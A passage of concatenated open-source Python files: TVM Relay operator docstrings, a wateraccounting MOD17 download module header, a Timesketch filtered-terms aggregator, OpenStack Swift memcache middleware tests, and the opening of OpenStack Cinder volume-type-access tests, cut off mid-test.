    This operator accepts data layout specification.
    Semantically, the operator will convert the layout to the canonical layout
    (`NCHW` for data and `OIHW` for weight), perform the computation,
    then convert to the out_layout.


    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    weight : relay.Expr
        The weight expressions.

    strides : tuple of int, optional
        The strides of convoltution.

    padding : tuple of int, optional
        The padding of convolution on both sides of inputs before convolution.

    dilation : tuple of int, optional
        Specifies the dilation rate to be used for dilated convolution.

    groups : int, optional
        Number of groups for grouped convolution.

    channels : int, optional
        Number of output channels of this convolution.

    kernel_size : tuple of int, optional
        The spatial of the convolution kernel.

    data_layout : str, optional
        Layout of the input.

    weight_layout : str, optional
        Layout of the weight.

    out_layout : str, optional
        Layout of the output, by default, out_layout is the same as data_layout

    out_dtype : str, optional
        Specifies the output data type for mixed precision conv2d.

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.conv2d(data, weight, strides, padding, dilation,
                        groups, channels, kernel_size, data_layout,
                        weight_layout, out_layout, out_dtype)


def softmax(data, axis):
    r"""Computes softmax.

    .. math:: \text{softmax}(x)_i = \frac{exp(x_i)}{\sum_j exp(x_j)}

    .. note::
        This operator can be optimized away for inference.

    Parameters
    ----------
    data: relay.Expr
        The input data to the operator.

    axis: int
        The axis to sum over when computing softmax
    """

    return _make.softmax(data, axis)


def log_softmax(data, axis):
    r"""Computes log softmax.

    .. math::

        \text{log_softmax}(x)_i = \log \frac{exp(x_i)}{\sum_j exp(x_j)}

    .. note::
        This operator can be optimized away for inference.

    Parameters
    ----------
    data: relay.Expr
        The input data to the operator.

    axis: int
        The axis to sum over when computing softmax
    """

    return _make.log_softmax(data, axis)


def max_pool2d(data,
               pool_size=(1, 1),
               strides=(1, 1),
               padding=(0, 0),
               layout="NCHW",
               ceil_mode=False):
    r"""2D maximum pooling operator.

    This operator takes data as input and does 2D max value calculation
    with in pool_size sized window by striding defined by stride


    In the default case, where the data_layout is `NCHW`
    a data Tensor with shape `(batch_size, in_channels, height, width)`,
    to produce an output Tensor with the following rule:

    with data of shape (b, c, h, w) and pool_size (kh, kw)

    .. math::

        \mbox{out}(b, c, y, x)  = \max_{m=0, \ldots, kh-1} \max_{n=0, \ldots, kw-1}
             \mbox{data}(b, c, \mbox{stride}[0] * y + m, \mbox{stride}[1] * x + n)

    Padding is applied to data before the computation.
    ceil_mode is used to take ceil or floor while computing out shape.
    This operator accepts data layout specification.

    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    strides : tuple of int, optional
        The strides of pooling.

    padding : tuple of int, optional
        The padding for pooling.

    layout : str, optional
        Layout of the input.

    ceil_mode : bool, optional
        To enable or disable ceil while pooling.

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.max_pool2d(data, pool_size, strides, padding,
                            layout, ceil_mode)

def avg_pool2d(data,
               pool_size=(1, 1),
               strides=(1, 1),
               padding=(0, 0),
               layout="NCHW",
               ceil_mode=False,
               count_include_pad=False):
    r"""2D average pooling operator.

    This operator takes data as input and does 2D average value calculation
    with in pool_size sized window by striding defined by stride


    In the default case, where the data_layout is `NCHW`
    a data Tensor with shape `(batch_size, in_channels, height, width)`,
    to produce an output Tensor with the following rule:

    with data of shape (b, c, h, w), pool_size (kh, kw)

    .. math::

        \mbox{out}(b, c, y, x)  = \frac{1}{kh * kw} \sum_{m=0}^{kh-1} \sum_{n=0}^{kw-1}
             \mbox{data}(b, c, \mbox{stride}[0] * y + m, \mbox{stride}[1] * x + n)

    Padding is applied to data before the computation.
    ceil_mode is used to take ceil or floor while computing out shape.
    count_include_pad indicates including or excluding padded input values in computation.
    This operator accepts data layout specification.

    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    strides : tuple of int, optional
        The strides of pooling.

    padding : tuple of int, optional
        The padding for pooling.

    layout : str, optional
        Layout of the input.

    ceil_mode : bool, optional
        To enable or disable ceil while pooling.

    count_include_pad : bool, optional
        To include padding to compute the average.

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.avg_pool2d(data, pool_size, strides, padding,
                            layout, ceil_mode, count_include_pad)

def global_max_pool2d(data,
                      layout="NCHW"):
    r"""2D global maximum pooling operator.

    This operator takes data as input and does 2D max value calculation
    across each window represented by WxH.


    In the default case, where the data_layout is `NCHW`
    a data Tensor with shape `(batch_size, in_channels, height, width)`,
    to produce an output Tensor with the following rule:

    with data of shape (b, c, h, w)

    .. math::

        \mbox{out}(b, c, 1, 1)  = \max_{m=0, \ldots, h} \max_{n=0, \ldots, w}
             \mbox{data}(b, c, m, n)

    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    layout : str, optional
        Layout of the input.

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.global_max_pool2d(data, layout)

def global_avg_pool2d(data,
                      layout="NCHW"):
    r"""2D global average pooling operator.

    This operator takes data as input and does 2D average value calculation
    across each window represented by WxH.


    In the default case, where the data_layout is `NCHW`
    a data Tensor with shape `(batch_size, in_channels, height, width)`,
    to produce an output Tensor with the following rule:

    with data of shape (b, c, h, w)

    .. math::

        \mbox{out}(b, c, 1, 1)  = \frac{1}{h * w} \sum_{m=0}^{h-1} \sum_{n=0}^{w-1}
             \mbox{data}(b, c, m, n)

    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    layout : str, optional
        Layout of the input.

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.global_avg_pool2d(data, layout)


def upsampling(data,
               scale=1,
               layout="NCHW",
               method="NEAREST_NEIGHBOR"):
    """Upsampling.

    This operator takes data as input and does 2D scaling to the given scale factor.
    In the default case, where the data_layout is `NCHW`
    with data of shape (n, c, h, w)
    out will have a shape (n, c, h*scale, w*scale)

    method indicates the algorithm to be used while calculating ghe out value
    and method can be one of ("BILINEAR", "NEAREST_NEIGHBOR")

    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    scale : relay.Expr
        The scale factor for upsampling.

    layout : str, optional
        Layout of the input.

    method : str, optional
        Scale method to used [NEAREST_NEIGHBOR, BILINEAR].

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.upsampling(data, scale, layout, method)

def batch_flatten(data):
    """BatchFlatten.

    This operator flattens all the dimensions except for the batch dimension.
    which results a 2D output.

    For data with shape ``(d1, d2, ..., dk)``
    batch_flatten(data) returns reshaped output of shape ``(d1, d2*...*dk)``.


    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    Returns
    -------
    result: relay.Expr
        The Flattened result.
    """
    return _make.batch_flatten(data)

# -*- coding: utf-8 -*-
"""
Authors: Tim Hessels
         UNESCO-IHE 2016
Contact: t.hessels@unesco-ihe.org
Repository: https://github.com/wateraccounting/wa
Module: Collect/MOD17

Description:
This module downloads MOD17 GPP data from
http://e4ftl01.cr.usgs.gov/. Use the MOD17.GPP_8daily function to
download and create 8 daily GPP images in Gtiff format.
The data is available between 2000-02-18 till present.

Examples:
from wa.Collect import MOD17
MOD17.GPP_8daily(Dir='C:/Temp3/', Startdate='2003-12-01', Enddate='2003-12-20',
           latlim=[41, 45], lonlim=[-8, -5])
MOD17.NPP_yearly(Dir='C:/Temp3/', Startdate='2003-12-01', Enddate='2003-12-20',
           latlim=[41, 45], lonlim=[-8, -5])		   
"""

from .GPP_8daily import main as GPP_8daily
from .NPP_yearly import main as NPP_yearly

__all__ = ['GPP_8daily', 'NPP_yearly']

__version__ = '0.1'

# Copyright 2019 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Term aggregations."""

from __future__ import unicode_literals

from timesketch.lib.aggregators import manager
from timesketch.lib.aggregators import interface


def get_spec(field, limit=10, query='', query_dsl=''):
    """Returns aggregation specs for a term of filtered events.

    The aggregation spec will summarize values of an attribute
    whose events fall under a filter.

    Args:
        field (str): this denotes the event attribute that is used
            for aggregation.
        limit (int): How many buckets to return, defaults to 10.
        query (str): the query field to run on all documents prior to
            aggregating the results.
        query_dsl (str): the query DSL field to run on all documents prior
            to aggregating the results (optional). Either a query string
            or a query DSL has to be present.

    Raises:
        ValueError: if neither query_string or query_dsl is provided.

    Returns:
        a dict value that can be used as an aggregation spec.
    """
    if query:
        query_filter = {
            'bool': {
                'must': [
                    {
                        'query_string': {
                            'query': query
                        }
                    }
                ]
            }
        }
    elif query_dsl:
        query_filter = query_dsl
    else:
        raise ValueError('Neither query nor query DSL provided.')


    return {
        'query': query_filter,
        'aggs': {
            'aggregation': {
                'terms': {
                    'field': field,
                    'size': limit
                }
            }
        }
    }


class FilteredTermsAggregation(interface.BaseAggregator):
    """Query Filter Term Aggregation."""

    NAME = 'query_bucket'
    DISPLAY_NAME = 'Filtered Terms Aggregation'
    DESCRIPTION = 'Aggregating values of a field after applying a filter'

    SUPPORTED_CHARTS = frozenset(
        ['barchart', 'circlechart', 'hbarchart', 'linechart', 'table'])

    FORM_FIELDS = [
        {
            'type': 'ts-dynamic-form-select-input',
            'name': 'supported_charts',
            'label': 'Chart type to render',
            'options': list(SUPPORTED_CHARTS),
            'display': True
        },
        {
            'name': 'query_string',
            'type': 'ts-dynamic-form-text-input',
            'label': 'The filter query to narrow down the result set',
            'placeholder': 'Query',
            'default_value': '',
            'display': True
        },
        {
            'name': 'query_dsl',
            'type': 'ts-dynamic-form-text-input',
            'label': 'The filter query DSL to narrow down the result',
            'placeholder': 'Query DSL',
            'default_value': '',
            'display': False
        },
        {
            'name': 'field',
            'type': 'ts-dynamic-form-text-input',
            'label': 'What field to aggregate.',
            'display': True
        },
        {
            'type': 'ts-dynamic-form-datetime-input',
            'name': 'start_time',
            'label': (
                'ISO formatted timestamp for the start time '
                'of the aggregated data'),
            'placeholder': 'Enter a start date for the aggregation',
            'default_value': '',
            'display': True
        },
        {
            'type': 'ts-dynamic-form-datetime-input',
            'name': 'end_time',
            'label': 'ISO formatted end time for the aggregation',
            'placeholder': 'Enter an end date for the aggregation',
            'default_value': '',
            'display': True
        },
        {
            'type': 'ts-dynamic-form-text-input',
            'name': 'limit',
            'label': 'Number of results to return',
            'placeholder': 'Enter number of results to return',
            'default_value': '10',
            'display': True
        }
    ]

    @property
    def chart_title(self):
        """Returns a title for the chart."""
        if self.field:
            return 'Top filtered results for "{0:s}"'.format(self.field)
        return 'Top results for an unknown field after filtering'

    # pylint: disable=arguments-differ
    def run(
            self, field, query_string='', query_dsl='',
            supported_charts='table', start_time='', end_time='', limit=10):
        """Run the aggregation.

        Args:
            field (str): this denotes the event attribute that is used
                for aggregation.
            query_string (str): the query field to run on all documents prior to
                aggregating the results.
            query_dsl (str): the query DSL field to run on all documents prior
                to aggregating the results. Either a query string or a query
                DSL has to be present.
            supported_charts: Chart type to render. Defaults to table.
            start_time: Optional ISO formatted date string that limits the time
                range for the aggregation.
            end_time: Optional ISO formatted date string that limits the time
                range for the aggregation.
            limit (int): How many buckets to return, defaults to 10.

        Returns:
            Instance of interface.AggregationResult with aggregation result.

        Raises:
            ValueError: if neither query_string or query_dsl is provided.
        """
        if not (query_string or query_dsl):
            raise ValueError('Both query_string and query_dsl are missing')

        self.field = field
        formatted_field_name = self.format_field_by_type(field)

        aggregation_spec = get_spec(
            field=formatted_field_name, limit=limit, query=query_string,
            query_dsl=query_dsl)

        aggregation_spec = self._add_query_to_aggregation_spec(
            aggregation_spec, start_time=start_time, end_time=end_time)

        # Encoding information for Vega-Lite.
        encoding = {
            'x': {
                'field': field,
                'type': 'nominal',
                'sort': {
                    'op': 'sum',
                    'field': 'count',
                    'order': 'descending'
                }
            },
            'y': {'field': 'count', 'type': 'quantitative'},
            'tooltip': [
                {'field': field, 'type': 'nominal'},
                {'field': 'count', 'type': 'quantitative'}],
        }

        response = self.opensearch_aggregation(aggregation_spec)
        aggregations = response.get('aggregations', {})
        aggregation = aggregations.get('aggregation', {})

        buckets = aggregation.get('buckets', [])
        values = []
        for bucket in buckets:
            d = {
                field: bucket.get('key', 'N/A'),
                'count': bucket.get('doc_count', 0)
            }
            values.append(d)

        if query_string:
            extra_query_url = 'AND {0:s}'.format(query_string)
        else:
            extra_query_url = ''

        return interface.AggregationResult(
            encoding=encoding, values=values, chart_type=supported_charts,
            sketch_url=self._sketch_url, field=field,
            extra_query_url=extra_query_url)


manager.AggregatorManager.register_aggregator(FilteredTermsAggregation)

# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
from textwrap import dedent
import unittest

from eventlet.green import ssl
import mock
from six.moves.configparser import NoSectionError, NoOptionError

from swift.common.middleware import memcache
from swift.common.memcached import MemcacheRing
from swift.common.swob import Request
from swift.common.wsgi import loadapp

from test.unit import with_tempdir, patch_policies


class FakeApp(object):
    def __call__(self, env, start_response):
        return env


class ExcConfigParser(object):

    def read(self, path):
        raise Exception('read called with %r' % path)


class EmptyConfigParser(object):

    def read(self, path):
        return False


def get_config_parser(memcache_servers='1.2.3.4:5',
                      memcache_serialization_support='1',
                      memcache_max_connections='4',
                      section='memcache'):
    _srvs = memcache_servers
    _sers = memcache_serialization_support
    _maxc = memcache_max_connections
    _section = section

    class SetConfigParser(object):

        def items(self, section_name):
            if section_name != section:
                raise NoSectionError(section_name)
            return {
                'memcache_servers': memcache_servers,
                'memcache_serialization_support':
                memcache_serialization_support,
                'memcache_max_connections': memcache_max_connections,
            }

        def read(self, path):
            return True

        def get(self, section, option):
            if _section == section:
                if option == 'memcache_servers':
                    if _srvs == 'error':
                        raise NoOptionError(option, section)
                    return _srvs
                elif option == 'memcache_serialization_support':
                    if _sers == 'error':
                        raise NoOptionError(option, section)
                    return _sers
                elif option in ('memcache_max_connections',
                                'max_connections'):
                    if _maxc == 'error':
                        raise NoOptionError(option, section)
                    return _maxc
                else:
                    raise NoOptionError(option, section)
            else:
                raise NoSectionError(option)

    return SetConfigParser


def start_response(*args):
    pass


class TestCacheMiddleware(unittest.TestCase):

    def setUp(self):
        self.app = memcache.MemcacheMiddleware(FakeApp(), {})

    def test_cache_middleware(self):
        req = Request.blank('/something', environ={'REQUEST_METHOD': 'GET'})
        resp = self.app(req.environ, start_response)
        self.assertTrue('swift.cache' in resp)
        self.assertTrue(isinstance(resp['swift.cache'], MemcacheRing))

    def test_conf_default_read(self):
        with mock.patch.object(memcache, 'ConfigParser', ExcConfigParser):
            for d in ({},
                      {'memcache_servers': '6.7.8.9:10'},
                      {'memcache_serialization_support': '0'},
                      {'memcache_max_connections': '30'},
                      {'memcache_servers': '6.7.8.9:10',
                       'memcache_serialization_support': '0'},
                      {'memcache_servers': '6.7.8.9:10',
                       'memcache_max_connections': '30'},
                      {'memcache_serialization_support': '0',
                       'memcache_max_connections': '30'}
                      ):
                with self.assertRaises(Exception) as catcher:
                    memcache.MemcacheMiddleware(FakeApp(), d)
                self.assertEqual(
                    str(catcher.exception),
                    "read called with '/etc/swift/memcache.conf'")

    def test_conf_set_no_read(self):
        with mock.patch.object(memcache, 'ConfigParser', ExcConfigParser):
            exc = None
            try:
                memcache.MemcacheMiddleware(
                    FakeApp(), {'memcache_servers': '1.2.3.4:5',
                                'memcache_serialization_support': '2',
                                'memcache_max_connections': '30'})
            except Exception as err:
                exc = err
        self.assertIsNone(exc)

    def test_conf_default(self):
        with mock.patch.object(memcache, 'ConfigParser', EmptyConfigParser):
            app = memcache.MemcacheMiddleware(FakeApp(), {})
        self.assertEqual(app.memcache_servers, '127.0.0.1:11211')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, False)
        self.assertEqual(
            app.memcache._client_cache['127.0.0.1:11211'].max_size, 2)

    def test_conf_inline(self):
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'memcache_servers': '6.7.8.9:10',
                 'memcache_serialization_support': '0',
                 'memcache_max_connections': '5'})
        self.assertEqual(app.memcache_servers, '6.7.8.9:10')
        self.assertEqual(app.memcache._allow_pickle, True)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['6.7.8.9:10'].max_size, 5)

    def test_conf_inline_ratelimiting(self):
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'error_suppression_limit': '5',
                 'error_suppression_interval': '2.5'})
        self.assertEqual(app.memcache._error_limit_count, 5)
        self.assertEqual(app.memcache._error_limit_time, 2.5)
        self.assertEqual(app.memcache._error_limit_duration, 2.5)

    def test_conf_inline_tls(self):
        fake_context = mock.Mock()
        with mock.patch.object(ssl, 'create_default_context',
                               return_value=fake_context):
            with mock.patch.object(memcache, 'ConfigParser',
                                   get_config_parser()):
                memcache.MemcacheMiddleware(
                    FakeApp(),
                    {'tls_enabled': 'true',
                     'tls_cafile': 'cafile',
                     'tls_certfile': 'certfile',
                     'tls_keyfile': 'keyfile'})
            ssl.create_default_context.assert_called_with(cafile='cafile')
            fake_context.load_cert_chain.assert_called_with('certfile',
                                                            'keyfile')

    def test_conf_extra_no_section(self):
        with mock.patch.object(memcache, 'ConfigParser',
                               get_config_parser(section='foobar')):
            app = memcache.MemcacheMiddleware(FakeApp(), {})
        self.assertEqual(app.memcache_servers, '127.0.0.1:11211')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, False)
        self.assertEqual(
            app.memcache._client_cache['127.0.0.1:11211'].max_size, 2)

    def test_conf_extra_no_option(self):
        replacement_parser = get_config_parser(
            memcache_servers='error', memcache_serialization_support='error',
            memcache_max_connections='error')
        with mock.patch.object(memcache, 'ConfigParser', replacement_parser):
            app = memcache.MemcacheMiddleware(FakeApp(), {})
        self.assertEqual(app.memcache_servers, '127.0.0.1:11211')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, False)
        self.assertEqual(
            app.memcache._client_cache['127.0.0.1:11211'].max_size, 2)

    def test_conf_inline_other_max_conn(self):
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'memcache_servers': '6.7.8.9:10',
                 'memcache_serialization_support': '0',
                 'max_connections': '5'})
        self.assertEqual(app.memcache_servers, '6.7.8.9:10')
        self.assertEqual(app.memcache._allow_pickle, True)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['6.7.8.9:10'].max_size, 5)

    def test_conf_inline_bad_max_conn(self):
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'memcache_servers': '6.7.8.9:10',
                 'memcache_serialization_support': '0',
                 'max_connections': 'bad42'})
        self.assertEqual(app.memcache_servers, '6.7.8.9:10')
        self.assertEqual(app.memcache._allow_pickle, True)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['6.7.8.9:10'].max_size, 4)

    def test_conf_from_extra_conf(self):
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(FakeApp(), {})
        self.assertEqual(app.memcache_servers, '1.2.3.4:5')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['1.2.3.4:5'].max_size, 4)

    def test_conf_from_extra_conf_bad_max_conn(self):
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser(
                memcache_max_connections='bad42')):
            app = memcache.MemcacheMiddleware(FakeApp(), {})
        self.assertEqual(app.memcache_servers, '1.2.3.4:5')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['1.2.3.4:5'].max_size, 2)

    def test_conf_from_inline_and_maxc_from_extra_conf(self):
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'memcache_servers': '6.7.8.9:10',
                 'memcache_serialization_support': '0'})
        self.assertEqual(app.memcache_servers, '6.7.8.9:10')
        self.assertEqual(app.memcache._allow_pickle, True)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['6.7.8.9:10'].max_size, 4)

    def test_conf_from_inline_and_sers_from_extra_conf(self):
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'memcache_servers': '6.7.8.9:10',
                 'memcache_max_connections': '42'})
        self.assertEqual(app.memcache_servers, '6.7.8.9:10')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['6.7.8.9:10'].max_size, 42)

    def test_filter_factory(self):
        factory = memcache.filter_factory({'max_connections': '3'},
                                          memcache_servers='10.10.10.10:10',
                                          memcache_serialization_support='1')
        thefilter = factory('myapp')
        self.assertEqual(thefilter.app, 'myapp')
        self.assertEqual(thefilter.memcache_servers, '10.10.10.10:10')
        self.assertEqual(thefilter.memcache._allow_pickle, False)
        self.assertEqual(thefilter.memcache._allow_unpickle, True)
        self.assertEqual(
            thefilter.memcache._client_cache['10.10.10.10:10'].max_size, 3)

    @patch_policies
    def _loadapp(self, proxy_config_path):
        """
        Load a proxy from an app.conf to get the memcache_ring

        :returns: the memcache_ring of the memcache middleware filter
        """
        with mock.patch('swift.proxy.server.Ring'):
            app = loadapp(proxy_config_path)
        memcache_ring = None
        while True:
            memcache_ring = getattr(app, 'memcache', None)
            if memcache_ring:
                break
            app = app.app
        return memcache_ring

    @with_tempdir
    def test_real_config(self, tempdir):
        config = """
        [pipeline:main]
        pipeline = cache proxy-server

        [app:proxy-server]
        use = egg:swift#proxy

        [filter:cache]
        use = egg:swift#memcache
        """
        config_path = os.path.join(tempdir, 'test.conf')
        with open(config_path, 'w') as f:
            f.write(dedent(config))
        memcache_ring = self._loadapp(config_path)
        # only one server by default
        self.assertEqual(list(memcache_ring._client_cache.keys()),
                         ['127.0.0.1:11211'])
        # extra options
        self.assertEqual(memcache_ring._connect_timeout, 0.3)
        self.assertEqual(memcache_ring._pool_timeout, 1.0)
        # tries is limited to server count
        self.assertEqual(memcache_ring._tries, 1)
        self.assertEqual(memcache_ring._io_timeout, 2.0)

    @with_tempdir
    def test_real_config_with_options(self, tempdir):
        config = """
        [pipeline:main]
        pipeline = cache proxy-server

        [app:proxy-server]
        use = egg:swift#proxy

        [filter:cache]
        use = egg:swift#memcache
        memcache_servers = 10.0.0.1:11211,10.0.0.2:11211,10.0.0.3:11211,
            10.0.0.4:11211
        connect_timeout = 1.0
        pool_timeout = 0.5
        tries = 4
        io_timeout = 1.0
        tls_enabled = true
        """
        config_path = os.path.join(tempdir, 'test.conf')
        with open(config_path, 'w') as f:
            f.write(dedent(config))
        memcache_ring = self._loadapp(config_path)
        self.assertEqual(sorted(memcache_ring._client_cache.keys()),
                         ['10.0.0.%d:11211' % i for i in range(1, 5)])
        # extra options
        self.assertEqual(memcache_ring._connect_timeout, 1.0)
        self.assertEqual(memcache_ring._pool_timeout, 0.5)
        # tries is limited to server count
        self.assertEqual(memcache_ring._tries, 4)
        self.assertEqual(memcache_ring._io_timeout, 1.0)
        self.assertEqual(memcache_ring._error_limit_count, 10)
        self.assertEqual(memcache_ring._error_limit_time, 60)
        self.assertEqual(memcache_ring._error_limit_duration, 60)
        self.assertIsInstance(
            list(memcache_ring._client_cache.values())[0]._tls_context,
            ssl.SSLContext)

    @with_tempdir
    def test_real_memcache_config(self, tempdir):
        proxy_config = """
        [DEFAULT]
        swift_dir = %s

        [pipeline:main]
        pipeline = cache proxy-server

        [app:proxy-server]
        use = egg:swift#proxy

        [filter:cache]
        use = egg:swift#memcache
        connect_timeout = 1.0
        """ % tempdir
        proxy_config_path = os.path.join(tempdir, 'test.conf')
        with open(proxy_config_path, 'w') as f:
            f.write(dedent(proxy_config))

        memcache_config = """
        [memcache]
        memcache_servers = 10.0.0.1:11211,10.0.0.2:11211,10.0.0.3:11211,
            10.0.0.4:11211
        connect_timeout = 0.5
        io_timeout = 1.0
        error_suppression_limit = 0
        error_suppression_interval = 1.5
        """
        memcache_config_path = os.path.join(tempdir, 'memcache.conf')
        with open(memcache_config_path, 'w') as f:
            f.write(dedent(memcache_config))
        memcache_ring = self._loadapp(proxy_config_path)
        self.assertEqual(sorted(memcache_ring._client_cache.keys()),
                         ['10.0.0.%d:11211' % i for i in range(1, 5)])
        # proxy option takes precedence
        self.assertEqual(memcache_ring._connect_timeout, 1.0)
        # default tries are not limited by servers
        self.assertEqual(memcache_ring._tries, 3)
        # memcache conf options are defaults
        self.assertEqual(memcache_ring._io_timeout, 1.0)
        self.assertEqual(memcache_ring._error_limit_count, 0)
        self.assertEqual(memcache_ring._error_limit_time, 1.5)
        self.assertEqual(memcache_ring._error_limit_duration, 1.5)


if __name__ == '__main__':
    unittest.main()

#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import datetime

import webob

from cinder.api.contrib import volume_type_access as type_access
from cinder.api.v2 import types as types_api_v2
from cinder import context
from cinder import db
from cinder import exception
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit import fake_constants as fake


def generate_type(type_id, is_public):
    return {
        'id': type_id,
        'name': u'test',
        'deleted': False,
        'created_at': datetime.datetime(2012, 1, 1, 1, 1, 1, 1),
        'updated_at': None,
        'deleted_at': None,
        'is_public': bool(is_public)
    }

VOLUME_TYPES = {
    fake.VOLUME_TYPE_ID: generate_type(fake.VOLUME_TYPE_ID, True),
    fake.VOLUME_TYPE2_ID: generate_type(fake.VOLUME_TYPE2_ID, True),
    fake.VOLUME_TYPE3_ID: generate_type(fake.VOLUME_TYPE3_ID, False),
    fake.VOLUME_TYPE4_ID: generate_type(fake.VOLUME_TYPE4_ID, False)}

PROJ1_UUID = fake.PROJECT_ID
PROJ2_UUID = fake.PROJECT2_ID
PROJ3_UUID = fake.PROJECT3_ID

ACCESS_LIST = [{'volume_type_id': fake.VOLUME_TYPE3_ID,
                'project_id': PROJ2_UUID},
               {'volume_type_id': fake.VOLUME_TYPE3_ID,
                'project_id': PROJ3_UUID},
               {'volume_type_id': fake.VOLUME_TYPE4_ID,
                'project_id': PROJ3_UUID}]


def fake_volume_type_get(context, id, inactive=False, expected_fields=None):
    vol = VOLUME_TYPES[id]
    if expected_fields and 'projects' in expected_fields:
        vol['projects'] = [a['project_id']
                           for a in ACCESS_LIST if a['volume_type_id'] == id]
    return vol


def _has_type_access(type_id, project_id):
    for access in ACCESS_LIST:
        if access['volume_type_id'] == type_id and \
           access['project_id'] == project_id:
            return True
    return False


def fake_volume_type_get_all(context, inactive=False, filters=None,
                             marker=None, limit=None, sort_keys=None,
                             sort_dirs=None, offset=None, list_result=False):
    if filters is None or filters['is_public'] is None:
        if list_result:
            return list(VOLUME_TYPES.values())
        return VOLUME_TYPES
    res = {}
    for k, v in VOLUME_TYPES.items():
        if filters['is_public'] and _has_type_access(k, context.project_id):
            res.update({k: v})
            continue
        if v['is_public'] == filters['is_public']:
            res.update({k: v})
    if list_result:
        return list(res.values())
    return res


class FakeResponse(object):
    obj = {'volume_type': {'id': fake.VOLUME_TYPE_ID},
           'volume_types': [
               {'id': fake.VOLUME_TYPE_ID},
               {'id': fake.VOLUME_TYPE3_ID}]}

    def attach(self, **kwargs):
        pass


class FakeRequest(object):
    environ = {"cinder.context": context.get_admin_context()}

    def cached_resource_by_id(self, resource_id, name=None):
        return VOLUME_TYPES[resource_id]


class VolumeTypeAccessTest(test.TestCase):

    def setUp(self):
        super(VolumeTypeAccessTest, self).setUp()
        self.type_controller_v2 = types_api_v2.VolumeTypesController()
        self.type_access_controller = type_access.VolumeTypeAccessController()
        self.type_action_controller = type_access.VolumeTypeActionController()
        self.req = FakeRequest()
        self.context = self.req.environ['cinder.context']
        self.stubs.Set(db, 'volume_type_get',
                       fake_volume_type_get)
        self.stubs.Set(db, 'volume_type_get_all',
                       fake_volume_type_get_all)

    def assertVolumeTypeListEqual(self, expected, observed):
        self.assertEqual(len(expected), len(observed))
        expected = sorted(expected, key=lambda item: item['id'])
        observed = sorted(observed, key=lambda item: item['id'])
        for d1, d2 in zip(expected, observed):
            self.assertEqual(d1['id'], d2['id'])

    def test_list_type_access_public(self):
        """Querying os-volume-type-access on public type should return 404."""
        req = fakes.HTTPRequest.blank('/v2/%s/types/os-volume-type-access' %
                                      fake.PROJECT_ID,
                                      use_admin_context=True)
        self.assertRaises(webob.exc.HTTPNotFound,
                          self.type_access_controller.index,
                          req, fake.VOLUME_TYPE2_ID)

    def test_list_type_access_private(self):
        expected = {'volume_type_access': [
            {'volume_type_id': fake.VOLUME_TYPE3_ID,
             'project_id': PROJ2_UUID},
